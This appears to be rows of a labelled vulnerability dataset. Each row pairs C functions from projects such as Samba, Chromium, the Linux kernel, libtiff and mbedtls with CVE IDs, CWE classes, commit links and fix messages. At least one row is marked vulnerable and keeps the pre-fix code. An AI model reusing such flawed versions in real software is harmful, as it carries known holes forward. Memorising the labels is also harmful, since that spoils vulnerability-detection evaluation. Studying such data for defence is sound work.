/* * There might be more than one response * we need to defer the notifications */ if ((num_iov == 5) && (talloc_array_length(conn->pending) == 0)) { defer = false; } if (defer) { tevent_req_defer_callback(req, state->ev); } /* * Note: here we use talloc_reference() in a way * that does not expose it to the caller. */ inbuf_ref = talloc_reference(state->smb2.recv_iov, inbuf); if (tevent_req_nomem(inbuf_ref, req)) { continue; } /* copy the related buffers */ state->smb2.recv_iov[0] = cur[1]; state->smb2.recv_iov[1] = cur[2]; state->smb2.recv_iov[2] = cur[3]; tevent_req_done(req); } if (defer) { return NT_STATUS_RETRY; } return NT_STATUS_OK; }
static NTSTATUS smb2cli_conn_dispatch_incoming(struct smbXcli_conn *conn, TALLOC_CTX *tmp_mem, uint8_t *inbuf) { struct tevent_req *req; struct smbXcli_req_state *state = NULL; struct iovec *iov; int i, num_iov; NTSTATUS status; bool defer = true; struct smbXcli_session *last_session = NULL; size_t inbuf_len = smb_len_tcp(inbuf); status = smb2cli_inbuf_parse_compound(conn, inbuf + NBT_HDR_SIZE, inbuf_len, tmp_mem, &iov, &num_iov); if (!NT_STATUS_IS_OK(status)) { return status; } for (i=0; i<num_iov; i+=4) { uint8_t *inbuf_ref = NULL; struct iovec *cur = &iov[i]; uint8_t *inhdr = (uint8_t *)cur[1].iov_base; uint16_t opcode = SVAL(inhdr, SMB2_HDR_OPCODE); uint32_t flags = IVAL(inhdr, SMB2_HDR_FLAGS); uint64_t mid = BVAL(inhdr, SMB2_HDR_MESSAGE_ID); uint16_t req_opcode; uint32_t req_flags; uint16_t credits = SVAL(inhdr, SMB2_HDR_CREDIT); uint32_t new_credits; struct smbXcli_session *session = NULL; const DATA_BLOB *signing_key = NULL; bool was_encrypted = false; new_credits = conn->smb2.cur_credits; new_credits += credits; if (new_credits > UINT16_MAX) { return NT_STATUS_INVALID_NETWORK_RESPONSE; } conn->smb2.cur_credits += credits; req = smb2cli_conn_find_pending(conn, mid); if (req == NULL) { return NT_STATUS_INVALID_NETWORK_RESPONSE; } state = tevent_req_data(req, struct smbXcli_req_state); req_opcode = SVAL(state->smb2.hdr, SMB2_HDR_OPCODE); if (opcode != req_opcode) { return NT_STATUS_INVALID_NETWORK_RESPONSE; } req_flags = SVAL(state->smb2.hdr, SMB2_HDR_FLAGS); if (!(flags & SMB2_HDR_FLAG_REDIRECT)) { return NT_STATUS_INVALID_NETWORK_RESPONSE; } status = NT_STATUS(IVAL(inhdr, SMB2_HDR_STATUS)); if ((flags & SMB2_HDR_FLAG_ASYNC) && NT_STATUS_EQUAL(status, STATUS_PENDING)) { uint64_t async_id = BVAL(inhdr, SMB2_HDR_ASYNC_ID); if (state->smb2.got_async) { /* We only expect one STATUS_PENDING response */ return NT_STATUS_INVALID_NETWORK_RESPONSE; } state->smb2.got_async = true; /* * async interim responses are not signed, * even if the SMB2_HDR_FLAG_SIGNED flag * is set. */ state->smb2.cancel_flags = SMB2_HDR_FLAG_ASYNC; state->smb2.cancel_mid = 0; state->smb2.cancel_aid = async_id; if (state->smb2.notify_async) { tevent_req_defer_callback(req, state->ev); tevent_req_notify_callback(req); } continue; } session = state->session; if (req_flags & SMB2_HDR_FLAG_CHAINED) { session = last_session; } last_session = session; if (state->smb2.should_sign) { if (!(flags & SMB2_HDR_FLAG_SIGNED)) { return NT_STATUS_ACCESS_DENIED; } } if (flags & SMB2_HDR_FLAG_SIGNED) { uint64_t uid = BVAL(inhdr, SMB2_HDR_SESSION_ID); if (session == NULL) { struct smbXcli_session *s; s = state->conn->sessions; for (; s; s = s->next) { if (s->smb2->session_id != uid) { continue; } session = s; break; } } if (session == NULL) { return NT_STATUS_INVALID_NETWORK_RESPONSE; } last_session = session; signing_key = &session->smb2_channel.signing_key; } if (opcode == SMB2_OP_SESSSETUP) { /* * We prefer the channel signing key, if it is * already there. * * If we do not have a channel signing key yet, * we try the main signing key, if it is not * the final response. */ if (signing_key && signing_key->length == 0 && !NT_STATUS_IS_OK(status)) { signing_key = &session->smb2->signing_key; } if (signing_key && signing_key->length == 0) { /* * If we do not have a session key to * verify the signature, we defer the * signing check to the caller. * * The caller gets NT_STATUS_OK, it * has to call * smb2cli_session_set_session_key() * or * smb2cli_session_set_channel_key() * which will check the signature * with the channel signing key. */ signing_key = NULL; } } if (cur[0].iov_len == SMB2_TF_HDR_SIZE) { const uint8_t *tf = (const uint8_t *)cur[0].iov_base; uint64_t uid = BVAL(tf, SMB2_TF_SESSION_ID); /* * If the response was encrypted in a SMB2_TRANSFORM * pdu, which belongs to the correct session, * we do not need to do signing checks * * It could be the session the response belongs to * or the session that was used to encrypt the * SMB2_TRANSFORM request. */ if ((session && session->smb2->session_id == uid) || (state->smb2.encryption_session_id == uid)) { signing_key = NULL; was_encrypted = true; } } if (NT_STATUS_EQUAL(status, NT_STATUS_USER_SESSION_DELETED)) { /* * if the server returns NT_STATUS_USER_SESSION_DELETED * the response is not signed and we should * propagate the NT_STATUS_USER_SESSION_DELETED * status to the caller. */ state->smb2.signing_skipped = true; signing_key = NULL; } if (NT_STATUS_EQUAL(status, NT_STATUS_INVALID_PARAMETER)) { /* * if the server returns * NT_STATUS_INVALID_PARAMETER * the response might not be encrypted. */ if (state->smb2.should_encrypt && !was_encrypted) { state->smb2.signing_skipped = true; signing_key = NULL; } } if (state->smb2.should_encrypt && !was_encrypted) { if (!state->smb2.signing_skipped) { return NT_STATUS_ACCESS_DENIED; } } if (NT_STATUS_EQUAL(status, NT_STATUS_NETWORK_NAME_DELETED) || NT_STATUS_EQUAL(status, NT_STATUS_FILE_CLOSED) || NT_STATUS_EQUAL(status, NT_STATUS_INVALID_PARAMETER)) { /* * if the server returns * NT_STATUS_NETWORK_NAME_DELETED * NT_STATUS_FILE_CLOSED * NT_STATUS_INVALID_PARAMETER * the response might not be signed * as this happens before the signing checks. * * If server echos the signature (or all zeros) * we should report the status from the server * to the caller. */ if (signing_key) { int cmp; cmp = memcmp(inhdr+SMB2_HDR_SIGNATURE, state->smb2.hdr+SMB2_HDR_SIGNATURE, 16); if (cmp == 0) { state->smb2.signing_skipped = true; signing_key = NULL; } } if (signing_key) { int cmp; static const uint8_t zeros[16]; cmp = memcmp(inhdr+SMB2_HDR_SIGNATURE, zeros, 16); if (cmp == 0) { state->smb2.signing_skipped = true; signing_key = NULL; } } } if (signing_key) { status = smb2_signing_check_pdu(*signing_key, state->conn->protocol, &cur[1], 3); if (!NT_STATUS_IS_OK(status)) { /* * If the signing check fails, we disconnect * the connection. */ return status; } } if (NT_STATUS_EQUAL(status, NT_STATUS_NETWORK_SESSION_EXPIRED) && (session != NULL) && session->disconnect_expired) { /* * this should be a short term hack * until the upper layers have implemented * re-authentication. */ return status; } smbXcli_req_unset_pending(req); /* * There might be more than one response * we need to defer the notifications */ if ((num_iov == 5) && (talloc_array_length(conn->pending) == 0)) { defer = false; } if (defer) { tevent_req_defer_callback(req, state->ev); } /* * Note: here we use talloc_reference() in a way * that does not expose it to the caller. */ inbuf_ref = talloc_reference(state->smb2.recv_iov, inbuf); if (tevent_req_nomem(inbuf_ref, req)) { continue; } /* copy the related buffers */ state->smb2.recv_iov[0] = cur[1]; state->smb2.recv_iov[1] = cur[2]; state->smb2.recv_iov[2] = cur[3]; tevent_req_done(req); } if (defer) { return NT_STATUS_RETRY; } return NT_STATUS_OK; }
C
samba
0
CVE-2016-5126
https://www.cvedetails.com/cve/CVE-2016-5126/
CWE-119
https://git.qemu.org/?p=qemu.git;a=commit;h=a6b3167fa0e825aebb5a7cd8b437b6d41584a196
a6b3167fa0e825aebb5a7cd8b437b6d41584a196
null
static void iscsi_co_generic_bh_cb(void *opaque) { struct IscsiTask *iTask = opaque; iTask->complete = 1; qemu_bh_delete(iTask->bh); qemu_coroutine_enter(iTask->co, NULL); }
static void iscsi_co_generic_bh_cb(void *opaque) { struct IscsiTask *iTask = opaque; iTask->complete = 1; qemu_bh_delete(iTask->bh); qemu_coroutine_enter(iTask->co, NULL); }
C
qemu
0
CVE-2017-5118
https://www.cvedetails.com/cve/CVE-2017-5118/
CWE-732
https://github.com/chromium/chromium/commit/0ab2412a104d2f235d7b9fe19d30ef605a410832
0ab2412a104d2f235d7b9fe19d30ef605a410832
Inherit CSP when we inherit the security origin This prevents attacks that use main window navigation to get out of the existing csp constraints such as the related bug Bug: 747847 Change-Id: I1e57b50da17f65d38088205b0a3c7c49ef2ae4d8 Reviewed-on: https://chromium-review.googlesource.com/592027 Reviewed-by: Mike West <[email protected]> Commit-Queue: Andy Paicu <[email protected]> Cr-Commit-Position: refs/heads/master@{#492333}
ResizeObserverController& Document::EnsureResizeObserverController() { if (!resize_observer_controller_) resize_observer_controller_ = new ResizeObserverController(); return *resize_observer_controller_; }
ResizeObserverController& Document::EnsureResizeObserverController() { if (!resize_observer_controller_) resize_observer_controller_ = new ResizeObserverController(); return *resize_observer_controller_; }
C
Chrome
0
CVE-2011-4131
https://www.cvedetails.com/cve/CVE-2011-4131/
CWE-189
https://github.com/torvalds/linux/commit/bf118a342f10dafe44b14451a1392c3254629a1f
bf118a342f10dafe44b14451a1392c3254629a1f
NFSv4: include bitmap in nfsv4 get acl data The NFSv4 bitmap size is unbounded: a server can return an arbitrary sized bitmap in an FATTR4_WORD0_ACL request. Replace using the nfs4_fattr_bitmap_maxsz as a guess to the maximum bitmask returned by a server with the inclusion of the bitmap (xdr length plus bitmasks) and the acl data xdr length to the (cached) acl page data. This is a general solution to commit e5012d1f "NFSv4.1: update nfs4_fattr_bitmap_maxsz" and fixes hitting a BUG_ON in xdr_shrink_bufhead when getting ACLs. Fix a bug in decode_getacl that returned -EINVAL on ACLs > page when getxattr was called with a NULL buffer, preventing ACL > PAGE_SIZE from being retrieved. Cc: [email protected] Signed-off-by: Andy Adamson <[email protected]> Signed-off-by: Trond Myklebust <[email protected]>
static void nfs41_sequence_prepare(struct rpc_task *task, void *data) { struct nfs4_sequence_data *calldata = data; struct nfs_client *clp = calldata->clp; struct nfs4_sequence_args *args; struct nfs4_sequence_res *res; args = task->tk_msg.rpc_argp; res = task->tk_msg.rpc_resp; if (nfs41_setup_sequence(clp->cl_session, args, res, 0, task)) return; rpc_call_start(task); }
static void nfs41_sequence_prepare(struct rpc_task *task, void *data) { struct nfs4_sequence_data *calldata = data; struct nfs_client *clp = calldata->clp; struct nfs4_sequence_args *args; struct nfs4_sequence_res *res; args = task->tk_msg.rpc_argp; res = task->tk_msg.rpc_resp; if (nfs41_setup_sequence(clp->cl_session, args, res, 0, task)) return; rpc_call_start(task); }
C
linux
0
null
null
null
https://github.com/chromium/chromium/commit/dcd10462fb49c72544719c490238f3a35edf3fc6
dcd10462fb49c72544719c490238f3a35edf3fc6
Open distiller UI setting through JavaScript This change adds support for opening the android view distiller settings from JavaScript via "distiller.openSettings". To avoid passing numerous objects into the DomDistillerViewerSource, the ExternalFeedbackReporter has been refactored into a generic UI handle that is responsible for any interaction between Chrome and Android specific controls and the distiller component. The actual UI in the page is not yet implemented. BUG= Review URL: https://codereview.chromium.org/1386043002 Cr-Commit-Position: refs/heads/master@{#354123}
void DistillerNativeJavaScript::EnsureServiceConnected() { if (!distiller_js_service_ || !distiller_js_service_.is_bound()) { render_frame_->GetServiceRegistry()->ConnectToRemoteService( mojo::GetProxy(&distiller_js_service_)); } }
void DistillerNativeJavaScript::EnsureServiceConnected() { if (!distiller_js_service_) { render_frame_->GetServiceRegistry()->ConnectToRemoteService( mojo::GetProxy(&distiller_js_service_)); } }
C
Chrome
1
CVE-2016-1621
https://www.cvedetails.com/cve/CVE-2016-1621/
CWE-119
https://android.googlesource.com/platform/external/libvpx/+/5a9753fca56f0eeb9f61e342b2fccffc364f9426
5a9753fca56f0eeb9f61e342b2fccffc364f9426
Merge Conflict Fix CL to lmp-mr1-release for ag/849478 DO NOT MERGE - libvpx: Pull from upstream Current HEAD: 7105df53d7dc13d5e575bc8df714ec8d1da36b06 BUG=23452792 Change-Id: Ic78176fc369e0bacc71d423e0e2e6075d004aaec
void Encoder::EncodeFrame(VideoSource *video, const unsigned long frame_flags) { if (video->img()) EncodeFrameInternal(*video, frame_flags); else Flush(); CxDataIterator iter = GetCxData(); while (const vpx_codec_cx_pkt_t *pkt = iter.Next()) { if (pkt->kind != VPX_CODEC_STATS_PKT) continue; stats_->Append(*pkt); } }
void Encoder::EncodeFrame(VideoSource *video, const unsigned long frame_flags) { if (video->img()) EncodeFrameInternal(*video, frame_flags); else Flush(); CxDataIterator iter = GetCxData(); while (const vpx_codec_cx_pkt_t *pkt = iter.Next()) { if (pkt->kind != VPX_CODEC_STATS_PKT) continue; stats_->Append(*pkt); } }
C
Android
0
CVE-2016-3821
https://www.cvedetails.com/cve/CVE-2016-3821/
CWE-476
https://android.googlesource.com/platform/frameworks/av/+/42a25c46b844518ff0d0b920c20c519e1417be69
42a25c46b844518ff0d0b920c20c519e1417be69
Don't use sp<>& because they may end up pointing to NULL after a NULL check was performed. Bug: 28166152 Change-Id: Iab2ea30395b620628cc6f3d067dd4f6fcda824fe
status_t MediaPlayer::setListener(const sp<MediaPlayerListener>& listener) { ALOGV("setListener"); Mutex::Autolock _l(mLock); mListener = listener; return NO_ERROR; }
status_t MediaPlayer::setListener(const sp<MediaPlayerListener>& listener) { ALOGV("setListener"); Mutex::Autolock _l(mLock); mListener = listener; return NO_ERROR; }
C
Android
0
CVE-2018-6096
https://www.cvedetails.com/cve/CVE-2018-6096/
null
https://github.com/chromium/chromium/commit/36f801fdbec07d116a6f4f07bb363f10897d6a51
36f801fdbec07d116a6f4f07bb363f10897d6a51
If a page calls |window.focus()|, kick it out of fullscreen. BUG=776418, 800056 Change-Id: I1880fe600e4814c073f247c43b1c1ac80c8fc017 Reviewed-on: https://chromium-review.googlesource.com/852378 Reviewed-by: Nasko Oskov <[email protected]> Reviewed-by: Philip Jägenstedt <[email protected]> Commit-Queue: Avi Drissman <[email protected]> Cr-Commit-Position: refs/heads/master@{#533790}
void RenderFrameImpl::LoadNavigationErrorPage( const WebURLRequest& failed_request, const WebURLError& error, bool replace, HistoryEntry* entry, const base::Optional<std::string>& error_page_content) { blink::WebFrameLoadType frame_load_type = entry ? blink::WebFrameLoadType::kBackForward : blink::WebFrameLoadType::kStandard; const blink::WebHistoryItem& history_item = entry ? entry->root() : blink::WebHistoryItem(); if (error.reason() == net::ERR_BLOCKED_BY_RESPONSE) { const blink::WebHistoryItem& blank_history_item = blink::WebHistoryItem(); frame_load_type = blink::WebFrameLoadType::kStandard; LoadNavigationErrorPageInternal("", GURL("data:,"), WebURL(), replace, frame_load_type, blank_history_item); return; } std::string error_html; if (error_page_content.has_value()) { error_html = error_page_content.value(); GetContentClient()->renderer()->PrepareErrorPage(this, failed_request, error, nullptr, nullptr); } else { GetContentClient()->renderer()->PrepareErrorPage( this, failed_request, error, &error_html, nullptr); } LoadNavigationErrorPageInternal(error_html, GURL(kUnreachableWebDataURL), error.url(), replace, frame_load_type, history_item); }
void RenderFrameImpl::LoadNavigationErrorPage( const WebURLRequest& failed_request, const WebURLError& error, bool replace, HistoryEntry* entry, const base::Optional<std::string>& error_page_content) { blink::WebFrameLoadType frame_load_type = entry ? blink::WebFrameLoadType::kBackForward : blink::WebFrameLoadType::kStandard; const blink::WebHistoryItem& history_item = entry ? entry->root() : blink::WebHistoryItem(); if (error.reason() == net::ERR_BLOCKED_BY_RESPONSE) { const blink::WebHistoryItem& blank_history_item = blink::WebHistoryItem(); frame_load_type = blink::WebFrameLoadType::kStandard; LoadNavigationErrorPageInternal("", GURL("data:,"), WebURL(), replace, frame_load_type, blank_history_item); return; } std::string error_html; if (error_page_content.has_value()) { error_html = error_page_content.value(); GetContentClient()->renderer()->PrepareErrorPage(this, failed_request, error, nullptr, nullptr); } else { GetContentClient()->renderer()->PrepareErrorPage( this, failed_request, error, &error_html, nullptr); } LoadNavigationErrorPageInternal(error_html, GURL(kUnreachableWebDataURL), error.url(), replace, frame_load_type, history_item); }
C
Chrome
0
CVE-2016-3751
https://www.cvedetails.com/cve/CVE-2016-3751/
null
https://android.googlesource.com/platform/external/libpng/+/9d4853418ab2f754c2b63e091c29c5529b8b86ca
9d4853418ab2f754c2b63e091c29c5529b8b86ca
DO NOT MERGE Update libpng to 1.6.20 BUG:23265085 Change-Id: I85199805636d771f3597b691b63bc0bf46084833 (cherry picked from commit bbe98b40cda082024b669fa508931042eed18f82)
int main(void) { fprintf(stderr, "pngvalid: no low level write support in libpng, all tests skipped\n"); /* So the test is skipped: */ return SKIP; }
int main(void) { fprintf(stderr, "pngvalid: no low level write support in libpng, all tests skipped\n"); /* So the test is skipped: */ return SKIP; }
C
Android
0
CVE-2014-7908
https://www.cvedetails.com/cve/CVE-2014-7908/
CWE-189
https://github.com/chromium/chromium/commit/b2006ac87cec58363090e7d5e10d5d9e3bbda9f9
b2006ac87cec58363090e7d5e10d5d9e3bbda9f9
Add extra checks to avoid integer overflow. BUG=425980 TEST=no crash with ASAN Review URL: https://codereview.chromium.org/659743004 Cr-Commit-Position: refs/heads/master@{#301249}
static bool CheckEac3(const uint8* buffer, int buffer_size) { RCHECK(buffer_size > 6); int offset = 0; while (offset + 6 < buffer_size) { BitReader reader(buffer + offset, 6); RCHECK(ReadBits(&reader, 16) == kAc3SyncWord); RCHECK(ReadBits(&reader, 2) != 3); reader.SkipBits(3); int frame_size = (ReadBits(&reader, 11) + 1) * 2; RCHECK(frame_size >= 7); reader.SkipBits(2 + 2 + 3 + 1); int bit_stream_id = ReadBits(&reader, 5); RCHECK(bit_stream_id >= 11 && bit_stream_id <= 16); offset += frame_size; } return true; }
static bool CheckEac3(const uint8* buffer, int buffer_size) { RCHECK(buffer_size > 6); int offset = 0; while (offset + 6 < buffer_size) { BitReader reader(buffer + offset, 6); RCHECK(ReadBits(&reader, 16) == kAc3SyncWord); RCHECK(ReadBits(&reader, 2) != 3); reader.SkipBits(3); int frame_size = (ReadBits(&reader, 11) + 1) * 2; RCHECK(frame_size >= 7); reader.SkipBits(2 + 2 + 3 + 1); int bit_stream_id = ReadBits(&reader, 5); RCHECK(bit_stream_id >= 11 && bit_stream_id <= 16); offset += frame_size; } return true; }
C
Chrome
0
CVE-2016-10746
https://www.cvedetails.com/cve/CVE-2016-10746/
CWE-254
https://github.com/libvirt/libvirt/commit/506e9d6c2d4baaf580d489fff0690c0ff2ff588f
506e9d6c2d4baaf580d489fff0690c0ff2ff588f
virDomainGetTime: Deny on RO connections We have a policy that if API may end up talking to a guest agent it should require RW connection. We don't obey the rule in virDomainGetTime(). Signed-off-by: Michal Privoznik <[email protected]>
virDomainPMSuspendForDuration(virDomainPtr dom, unsigned int target, unsigned long long duration, unsigned int flags) { virConnectPtr conn; VIR_DOMAIN_DEBUG(dom, "target=%u duration=%llu flags=%x", target, duration, flags); virResetLastError(); virCheckDomainReturn(dom, -1); conn = dom->conn; virCheckReadOnlyGoto(conn->flags, error); if (conn->driver->domainPMSuspendForDuration) { int ret; ret = conn->driver->domainPMSuspendForDuration(dom, target, duration, flags); if (ret < 0) goto error; return ret; } virReportUnsupportedError(); error: virDispatchError(conn); return -1; }
virDomainPMSuspendForDuration(virDomainPtr dom, unsigned int target, unsigned long long duration, unsigned int flags) { virConnectPtr conn; VIR_DOMAIN_DEBUG(dom, "target=%u duration=%llu flags=%x", target, duration, flags); virResetLastError(); virCheckDomainReturn(dom, -1); conn = dom->conn; virCheckReadOnlyGoto(conn->flags, error); if (conn->driver->domainPMSuspendForDuration) { int ret; ret = conn->driver->domainPMSuspendForDuration(dom, target, duration, flags); if (ret < 0) goto error; return ret; } virReportUnsupportedError(); error: virDispatchError(conn); return -1; }
C
libvirt
0
CVE-2017-14032
https://www.cvedetails.com/cve/CVE-2017-14032/
CWE-287
https://github.com/ARMmbed/mbedtls/commit/d15795acd5074e0b44e71f7ede8bdfe1b48591fc
d15795acd5074e0b44e71f7ede8bdfe1b48591fc
Improve behaviour on fatal errors If we didn't walk the whole chain, then there may be any kind of errors in the part of the chain we didn't check, so setting all flags looks like the safe thing to do.
static int x509_info_ext_key_usage( char **buf, size_t *size, const mbedtls_x509_sequence *extended_key_usage ) { int ret; const char *desc; size_t n = *size; char *p = *buf; const mbedtls_x509_sequence *cur = extended_key_usage; const char *sep = ""; while( cur != NULL ) { if( mbedtls_oid_get_extended_key_usage( &cur->buf, &desc ) != 0 ) desc = "???"; ret = mbedtls_snprintf( p, n, "%s%s", sep, desc ); MBEDTLS_X509_SAFE_SNPRINTF; sep = ", "; cur = cur->next; } *size = n; *buf = p; return( 0 ); }
static int x509_info_ext_key_usage( char **buf, size_t *size, const mbedtls_x509_sequence *extended_key_usage ) { int ret; const char *desc; size_t n = *size; char *p = *buf; const mbedtls_x509_sequence *cur = extended_key_usage; const char *sep = ""; while( cur != NULL ) { if( mbedtls_oid_get_extended_key_usage( &cur->buf, &desc ) != 0 ) desc = "???"; ret = mbedtls_snprintf( p, n, "%s%s", sep, desc ); MBEDTLS_X509_SAFE_SNPRINTF; sep = ", "; cur = cur->next; } *size = n; *buf = p; return( 0 ); }
C
mbedtls
0
CVE-2013-0838
https://www.cvedetails.com/cve/CVE-2013-0838/
CWE-264
https://github.com/chromium/chromium/commit/0bd1a6ddb5fb23dfea3e72d60e5e8df4cf5826bc
0bd1a6ddb5fb23dfea3e72d60e5e8df4cf5826bc
Make shared memory segments writable only by their rightful owners. BUG=143859 TEST=Chrome's UI still works on Linux and Chrome OS Review URL: https://chromiumcodereview.appspot.com/10854242 git-svn-id: svn://svn.chromium.org/chrome/trunk/src@158289 0039d316-1c4b-4281-b951-d872f2087c98
bool Enabled() { return loaded_extension_; }
bool Enabled() { return loaded_extension_; }
C
Chrome
0
CVE-2013-4244
https://www.cvedetails.com/cve/CVE-2013-4244/
CWE-119
https://github.com/vadz/libtiff/commit/ce6841d9e41d621ba23cf18b190ee6a23b2cc833
ce6841d9e41d621ba23cf18b190ee6a23b2cc833
fix possible OOB write in gif2tiff.c
convert(void) { int ch; char* mode = "w"; if (!checksignature()) return (-1); readscreen(); while ((ch = getc(infile)) != ';' && ch != EOF) { switch (ch) { case '\0': break; /* this kludge for non-standard files */ case ',': if (!readgifimage(mode)) return (-1); mode = "a"; /* subsequent images append */ break; case '!': readextension(); break; default: fprintf(stderr, "illegal GIF block type\n"); return (-1); } } return (0); }
convert(void) { int ch; char* mode = "w"; if (!checksignature()) return (-1); readscreen(); while ((ch = getc(infile)) != ';' && ch != EOF) { switch (ch) { case '\0': break; /* this kludge for non-standard files */ case ',': if (!readgifimage(mode)) return (-1); mode = "a"; /* subsequent images append */ break; case '!': readextension(); break; default: fprintf(stderr, "illegal GIF block type\n"); return (-1); } } return (0); }
C
libtiff
0
CVE-2016-1633
https://www.cvedetails.com/cve/CVE-2016-1633/
null
https://github.com/chromium/chromium/commit/eb750a539e4856ba9042abdf39ae9da58fa3ae63
eb750a539e4856ba9042abdf39ae9da58fa3ae63
Fix detached Attr nodes interaction with NodeIterator - Don't register NodeIterator to document when attaching to Attr node. -- NodeIterator is registered to its document to receive updateForNodeRemoval notifications. -- However it wouldn't make sense on Attr nodes, as they never have children. BUG=572537 Review URL: https://codereview.chromium.org/1577213003 Cr-Commit-Position: refs/heads/master@{#369687}
bool NodeIterator::NodePointer::moveToPrevious(Node* root) { if (!node) return false; if (!isPointerBeforeNode) { isPointerBeforeNode = true; return true; } node = NodeTraversal::previous(*node, root); return node; }
bool NodeIterator::NodePointer::moveToPrevious(Node* root) { if (!node) return false; if (!isPointerBeforeNode) { isPointerBeforeNode = true; return true; } node = NodeTraversal::previous(*node, root); return node; }
C
Chrome
0
CVE-2015-1274
https://www.cvedetails.com/cve/CVE-2015-1274/
CWE-254
https://github.com/chromium/chromium/commit/d27468a832d5316884bd02f459cbf493697fd7e1
d27468a832d5316884bd02f459cbf493697fd7e1
Switch to equalIgnoringASCIICase throughout modules/accessibility BUG=627682 Review-Url: https://codereview.chromium.org/2793913007 Cr-Commit-Position: refs/heads/master@{#461858}
bool AXObject::computeIsInertOrAriaHidden( IgnoredReasons* ignoredReasons) const { if (getNode()) { if (getNode()->isInert()) { if (ignoredReasons) { HTMLDialogElement* dialog = getActiveDialogElement(getNode()); if (dialog) { AXObject* dialogObject = axObjectCache().getOrCreate(dialog); if (dialogObject) ignoredReasons->push_back( IgnoredReason(AXActiveModalDialog, dialogObject)); else ignoredReasons->push_back(IgnoredReason(AXInert)); } else { ignoredReasons->push_back(IgnoredReason(AXInert)); } } return true; } } else { AXObject* parent = parentObject(); if (parent && parent->isInertOrAriaHidden()) { if (ignoredReasons) parent->computeIsInertOrAriaHidden(ignoredReasons); return true; } } const AXObject* hiddenRoot = ariaHiddenRoot(); if (hiddenRoot) { if (ignoredReasons) { if (hiddenRoot == this) ignoredReasons->push_back(IgnoredReason(AXAriaHidden)); else ignoredReasons->push_back(IgnoredReason(AXAriaHiddenRoot, hiddenRoot)); } return true; } return false; }
bool AXObject::computeIsInertOrAriaHidden( IgnoredReasons* ignoredReasons) const { if (getNode()) { if (getNode()->isInert()) { if (ignoredReasons) { HTMLDialogElement* dialog = getActiveDialogElement(getNode()); if (dialog) { AXObject* dialogObject = axObjectCache().getOrCreate(dialog); if (dialogObject) ignoredReasons->push_back( IgnoredReason(AXActiveModalDialog, dialogObject)); else ignoredReasons->push_back(IgnoredReason(AXInert)); } else { ignoredReasons->push_back(IgnoredReason(AXInert)); } } return true; } } else { AXObject* parent = parentObject(); if (parent && parent->isInertOrAriaHidden()) { if (ignoredReasons) parent->computeIsInertOrAriaHidden(ignoredReasons); return true; } } const AXObject* hiddenRoot = ariaHiddenRoot(); if (hiddenRoot) { if (ignoredReasons) { if (hiddenRoot == this) ignoredReasons->push_back(IgnoredReason(AXAriaHidden)); else ignoredReasons->push_back(IgnoredReason(AXAriaHiddenRoot, hiddenRoot)); } return true; } return false; }
C
Chrome
0
CVE-2016-3078
https://www.cvedetails.com/cve/CVE-2016-3078/
CWE-190
https://github.com/php/php-src/commit/3b8d4de300854b3517c7acb239b84f7726c1353c?w=1
3b8d4de300854b3517c7acb239b84f7726c1353c?w=1
Fix bug #71923 - integer overflow in ZipArchive::getFrom*
static zend_object *php_zip_object_new(zend_class_entry *class_type) /* {{{ */ { ze_zip_object *intern; intern = ecalloc(1, sizeof(ze_zip_object) + zend_object_properties_size(class_type)); intern->prop_handler = &zip_prop_handlers; zend_object_std_init(&intern->zo, class_type); object_properties_init(&intern->zo, class_type); intern->zo.handlers = &zip_object_handlers; return &intern->zo; } /* }}} */
static zend_object *php_zip_object_new(zend_class_entry *class_type) /* {{{ */ { ze_zip_object *intern; intern = ecalloc(1, sizeof(ze_zip_object) + zend_object_properties_size(class_type)); intern->prop_handler = &zip_prop_handlers; zend_object_std_init(&intern->zo, class_type); object_properties_init(&intern->zo, class_type); intern->zo.handlers = &zip_object_handlers; return &intern->zo; } /* }}} */
C
php-src
0
CVE-2013-0921
https://www.cvedetails.com/cve/CVE-2013-0921/
CWE-264
https://github.com/chromium/chromium/commit/e9841fbdaf41b4a2baaa413f94d5c0197f9261f4
e9841fbdaf41b4a2baaa413f94d5c0197f9261f4
Ensure extensions and the Chrome Web Store are loaded in new BrowsingInstances. BUG=174943 TEST=Can't post message to CWS. See bug for repro steps. Review URL: https://chromiumcodereview.appspot.com/12301013 git-svn-id: svn://svn.chromium.org/chrome/trunk/src@184208 0039d316-1c4b-4281-b951-d872f2087c98
bool ChromeContentBrowserClient::AllowSaveLocalState( content::ResourceContext* context) { DCHECK(BrowserThread::CurrentlyOn(BrowserThread::IO)); ProfileIOData* io_data = ProfileIOData::FromResourceContext(context); CookieSettings* cookie_settings = io_data->GetCookieSettings(); ContentSetting setting = cookie_settings->GetDefaultCookieSetting(NULL); return setting != CONTENT_SETTING_SESSION_ONLY; }
bool ChromeContentBrowserClient::AllowSaveLocalState( content::ResourceContext* context) { DCHECK(BrowserThread::CurrentlyOn(BrowserThread::IO)); ProfileIOData* io_data = ProfileIOData::FromResourceContext(context); CookieSettings* cookie_settings = io_data->GetCookieSettings(); ContentSetting setting = cookie_settings->GetDefaultCookieSetting(NULL); return setting != CONTENT_SETTING_SESSION_ONLY; }
C
Chrome
0
CVE-2015-1281
https://www.cvedetails.com/cve/CVE-2015-1281/
CWE-254
https://github.com/chromium/chromium/commit/dff368031150a1033a1a3c913f8857679a0279be
dff368031150a1033a1a3c913f8857679a0279be
Correctly keep track of isolates for microtask execution BUG=487155 [email protected] Review URL: https://codereview.chromium.org/1161823002 git-svn-id: svn://svn.chromium.org/blink/trunk@195985 bbb929c8-8fbe-4397-9dbb-9b2b20218538
void cancelTask() { m_taskCanceled = true; }
void cancelTask() { m_taskCanceled = true; }
C
Chrome
0
CVE-2014-1690
https://www.cvedetails.com/cve/CVE-2014-1690/
CWE-119
https://github.com/torvalds/linux/commit/2690d97ade05c5325cbf7c72b94b90d265659886
2690d97ade05c5325cbf7c72b94b90d265659886
netfilter: nf_nat: fix access to uninitialized buffer in IRC NAT helper Commit 5901b6be885e attempted to introduce IPv6 support into IRC NAT helper. By doing so, the following code seemed to be removed by accident: ip = ntohl(exp->master->tuplehash[IP_CT_DIR_REPLY].tuple.dst.u3.ip); sprintf(buffer, "%u %u", ip, port); pr_debug("nf_nat_irc: inserting '%s' == %pI4, port %u\n", buffer, &ip, port); This leads to the fact that buffer[] was left uninitialized and contained some stack value. When we call nf_nat_mangle_tcp_packet(), we call strlen(buffer) on excatly this uninitialized buffer. If we are unlucky and the skb has enough tailroom, we overwrite resp. leak contents with values that sit on our stack into the packet and send that out to the receiver. Since the rather informal DCC spec [1] does not seem to specify IPv6 support right now, we log such occurences so that admins can act accordingly, and drop the packet. I've looked into XChat source, and IPv6 is not supported there: addresses are in u32 and print via %u format string. Therefore, restore old behaviour as in IPv4, use snprintf(). The IRC helper does not support IPv6 by now. By this, 